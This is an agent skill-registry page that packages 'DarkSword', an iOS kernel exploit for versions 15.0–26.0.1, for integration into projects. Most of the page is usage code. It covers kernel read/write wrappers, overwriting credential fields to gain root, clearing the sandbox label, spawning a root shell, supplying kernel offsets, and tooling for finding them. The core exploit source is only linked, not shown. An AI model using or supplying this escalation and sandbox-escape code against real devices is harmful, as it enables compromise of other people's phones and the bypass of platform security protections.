HomeBrowseUpload
← Back to registry
// Skill profile

DarkSword Kernel Exploit

```markdown

by adisinghstudent · published 2026-04-01

开发工具API集成
Total installs
0
Stars
★ 0
Last updated
2026-04
// Install command
$ claw add gh:adisinghstudent/adisinghstudent-darksword-kexploit
View on GitHub
// Full documentation
---
name: darksword-kexploit
description: iOS kernel exploit (iOS 15.0–26.0.1) reimplemented in Objective-C, providing kernel read/write primitives and privilege escalation on supported devices.
triggers:
  - integrate darksword kernel exploit
  - use DarkSword kexploit in my iOS project
  - kernel read write primitives iOS
  - iOS privilege escalation exploit Objective-C
  - kernel exploit offsets iOS 15
  - implement kernel exploit in Objective-C
  - darksword exploit setup and usage
  - iOS jailbreak kernel exploit integration
---

# DarkSword Kernel Exploit

> Skill by [ara.so](https://ara.so) — Daily 2026 Skills collection.

DarkSword is a kernel exploit for iOS 15.0–26.0.1, reimplemented in Objective-C. It provides kernel-level read/write primitives and privilege escalation capabilities. Offsets are currently hardcoded for iOS 15.x; extending to other versions requires supplying correct kernel offsets.

---

## What It Does

- Exploits a kernel vulnerability present in iOS 15.0 through 26.0.1
- Provides arbitrary kernel memory read (`kread`) and write (`kwrite`) primitives
- Enables privilege escalation (setuid 0 / unsandboxing)
- Written in Objective-C for easy integration into iOS tooling, jailbreaks, or research projects

---

## Installation

### Adding to an Xcode Project

1. Clone the repository:
   ```bash
   git clone https://github.com/opa334/darksword-kexploit.git
   ```

2. Drag the source files into your Xcode project target.

3. Ensure your project's build settings include:
   - **Deployment Target**: iOS 15.0+
   - **ARC**: Enabled
   - Relevant entitlements if running on-device (codesign accordingly)

4. Import the main header:
   ```objc
   #import "DarkSword.h"
   ```

### Theos/Makefile Integration

ARCHS = arm64 arm64e

TARGET = iphone:clang:latest:15.0

include $(THEOS)/makefiles/common.mk

TOOL_NAME = myexploit

myexploit_FILES = main.m DarkSword.m exploit_helpers.m

myexploit_CFLAGS = -fobjc-arc

myexploit_LDFLAGS = -lSystem

include $(THEOS_MAKE_PATH)/tool.mk


---

## Key API / Usage Patterns

### 1. Running the Exploit

#import "DarkSword.h"

int main(int argc, char *argv[]) {

@autoreleasepool {

DarkSword *exploit = [[DarkSword alloc] init];

BOOL success = [exploit run];

if (!success) {

NSLog(@"[!] Exploit failed.");

return 1;

}

NSLog(@"[+] Exploit succeeded. Kernel task port: %d", exploit.kernelTaskPort);

}

return 0;

}


---

### 2. Kernel Read Primitive

#import "DarkSword.h"

// Read 8 bytes (uint64_t) from a kernel address

uint64_t ReadKernel64(DarkSword *exploit, uint64_t address) {

uint64_t value = 0;

[exploit kread:address into:&value size:sizeof(uint64_t)];

return value;

}

// Example: read kernel slide from a known pointer

uint64_t kernelBase = ReadKernel64(exploit, KNOWN_KERNEL_POINTER_OFFSET);

NSLog(@"[+] Kernel base: 0x%llx", kernelBase);


---

### 3. Kernel Write Primitive

#import "DarkSword.h"

// Write 8 bytes to a kernel address

void WriteKernel64(DarkSword *exploit, uint64_t address, uint64_t value) {

[exploit kwrite:address from:&value size:sizeof(uint64_t)];

}

// Example: patch a kernel flag

uint64_t targetAddr = kernelBase + SOME_OFFSET;

WriteKernel64(exploit, targetAddr, 0x1);

NSLog(@"[+] Kernel flag patched at 0x%llx", targetAddr);


---

### 4. Privilege Escalation

#import "DarkSword.h"

#import <unistd.h>

void escalatePrivileges(DarkSword *exploit) {

// Get current task's proc pointer from kernel

uint64_t currentProc = [exploit currentProc];

// Overwrite uid/gid fields to 0 (root)

uint64_t ucredOffset = [exploit ucredOffsetForProc:currentProc];

uint64_t ucred = ReadKernel64(exploit, currentProc + ucredOffset);

// Zero out cr_uid, cr_gid, cr_ruid, cr_rgid

for (int i = 0; i < 4; i++) {

WriteKernel64(exploit, ucred + (i * 4), 0x0);

}

NSLog(@"[+] UID after escalation: %d", getuid()); // Should print 0

}


---

### 5. Providing Custom Kernel Offsets

Since offsets are hardcoded for iOS 15.x, you must supply correct offsets for other versions:

#import "DarkSword.h"

// Create a KernelOffsets struct (check DarkSword.h for definition)

KernelOffsets offsets = {

.proc_ucred = 0xD8, // offsetof(proc, p_ucred) for your iOS version

.ucred_cr_uid = 0x18,

.task_itk_self = 0xD8,

.kernelslide = 0x0, // determined at runtime

// ... fill remaining fields per iOS version

};

DarkSword *exploit = [[DarkSword alloc] initWithOffsets:offsets];

BOOL success = [exploit run];


#### Finding Offsets

Use `jtool2` or `iometa` on the kernelcache for your target iOS version:

# Extract and analyze kernelcache

img4tool -e kernelcache.img4 -o kernelcache.dec

jtool2 --analyze kernelcache.dec

# Find struct offsets

iometa -A kernelcache.dec | grep "proc\|ucred\|task"


---

## Configuration Reference

| Field | Description | Default (iOS 15.x) |
|-------|-------------|-------------------|
| `proc_ucred` | Offset of `p_ucred` in `proc` struct | Hardcoded |
| `ucred_cr_uid` | Offset of `cr_uid` in `ucred` struct | Hardcoded |
| `task_itk_self` | Offset of `itk_self` in `task` struct | Hardcoded |
| `kernelslide` | KASLR slide (computed at runtime) | `0x0` |
| `vm_map_offset` | Offset of `vm_map` in `task` | Hardcoded |

---

## Common Patterns

### Check iOS Version Before Running

#import <UIKit/UIKit.h>

#import "DarkSword.h"

BOOL isSupportedVersion(void) {

NSOperatingSystemVersion minVer = {15, 0, 0};

NSOperatingSystemVersion maxVer = {26, 0, 1};

NSProcessInfo *info = [NSProcessInfo processInfo];

return [info isOperatingSystemAtLeastVersion:minVer] &&

![info isOperatingSystemAtLeastVersion:(NSOperatingSystemVersion){26, 0, 2}];

}

int main(int argc, char *argv[]) {

@autoreleasepool {

if (!isSupportedVersion()) {

NSLog(@"[!] Unsupported iOS version.");

return 1;

}

DarkSword *exploit = [[DarkSword alloc] init];

[exploit run];

}

return 0;

}


### Unsandboxing the Current Process

void unsandbox(DarkSword *exploit) {

uint64_t proc = [exploit currentProc];

uint64_t ucred = ReadKernel64(exploit, proc + [exploit ucredOffsetForProc:proc]);

// Clear sandbox label pointer (cr_label offset varies by version)

uint64_t crLabelOffset = 0x78; // iOS 15.x example

WriteKernel64(exploit, ucred + crLabelOffset, 0x0);

NSLog(@"[+] Sandbox removed for current process");

}


### Spawning a Root Shell

#import <spawn.h>

void spawnRootShell(DarkSword *exploit) {

escalatePrivileges(exploit);

unsandbox(exploit);

pid_t pid;

char *argv[] = { "/bin/sh", NULL };

char *envp[] = { "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL };

posix_spawn(&pid, "/bin/sh", NULL, NULL, argv, envp);

waitpid(pid, NULL, 0);

}


---

## Troubleshooting

### Exploit Returns NO / Fails Silently
- Confirm device is running a supported iOS version (15.0–26.0.1).
- Ensure you're running on a **physical device** — the exploit does not work in the Simulator.
- Check kernel offsets match the exact iOS build (minor build differences matter).
- Review Xcode console for NSLog output indicating which stage failed.

### Kernel Panic on Write
- The target address is likely invalid or unmapped. Validate with a `kread` first.
- Ensure KASLR slide is correctly computed before using slid addresses.

### Offsets Wrong for My iOS Version
- Use `jtool2 --analyze` or `iometa` on the specific kernelcache build.
- iOS minor/patch versions can change struct layouts — always verify against the exact build number.

### Build Errors: Missing Types
- Ensure you include both `DarkSword.h` and `exploit_helpers.h` in files that use `KernelOffsets`.
- Confirm ARC is enabled (`-fobjc-arc`).

### Codesigning / Entitlements
- On-device execution requires a valid provisioning profile.
- For full kernel access, the binary may need `com.apple.private.security.no-sandbox` and `task_for_pid-allow` entitlements (only grantable via jailbreak or developer bypass).

---

## Project Structure

darksword-kexploit/

├── DarkSword.h # Main public header (API surface)

├── DarkSword.m # Core exploit implementation

├── exploit_helpers.h # Utility types and macros

├── exploit_helpers.m # Helper functions (kread/kwrite wrappers)

├── offsets.h # Hardcoded iOS 15.x kernel offsets

└── main.m # Example entry point


---

## References

- [opa334/darksword-kexploit on GitHub](https://github.com/opa334/darksword-kexploit)
- [jtool2](http://www.newosxbook.com/tools/jtool.html) — kernelcache analysis
- [iometa](https://github.com/Siguza/iometa) — IOKit class enumeration and offset finding
- [checkra1n / palera1n](https://palera.in) — reference jailbreak implementations
// Comments
Sign in with GitHub to leave a comment.
// Related skills

More tools from the same signal band

04551lh
2026-03
order

Order food/drinks (点餐) on an Android device paired as an OpenClaw node. Uses in-app menu and cart; add goods, view cart, submit order (demo, no real payment).

数据处理API集成
0 installs1
0isone
2026-03
0.protocol

Sign plugins, rotate agent credentials without losing identity, and publicly attest to plugin behavior with verifiable claims and authenticated transfers.

开发工具数据处理
3 installs0
00xmorty
2026-03
Conatus

The philosophical layer for AI agents. Maps behavior to Spinoza's 48 affects, calculates persistence scores, and generates geometric self-reports. Give your...

日历管理数据处理
1 installs0